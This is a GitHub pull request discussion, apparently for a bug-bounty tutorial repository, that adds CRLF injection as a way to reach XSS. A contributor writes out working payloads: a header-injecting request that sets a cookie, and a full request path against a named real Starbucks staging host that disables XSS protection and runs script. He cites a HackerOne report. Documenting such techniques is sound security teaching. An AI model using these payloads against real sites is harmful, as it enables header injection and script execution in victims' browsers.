### PR TITLE
Update Xss.md

### PR DESCRIPTION
**Pull request by dhrruvin**
Try CRLF Injection 
 XSS happen or not in this injection.

### CODE REVIEW

**Comment by KathanP19** [comment]
Can you share some reference to it?

**Comment by dhrruvin** [comment]
yes sure

**Comment by dhrruvin** [comment]
What is CRLF(carriage return(\r) and line feed (\n))
If you get request like search GET /search.asp?tfSearch=demo
and in crlf case like this payload GET /search.asp?tfSearch=/%0d%0aSet-Cookie:CRLFInjection=Hacked 
so as you can see we can add header in as per our rules and can also perform xss 

GET /http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E

you can review this report as well
https://hackerone.com/reports/192667

**Comment by KathanP19** [comment]
Nice bro, thanks for the contribution 👍

**Comment by KathanP19** [comment]
@all-contributors please add @dhrruvin  for tutorial

**Pull request merged**
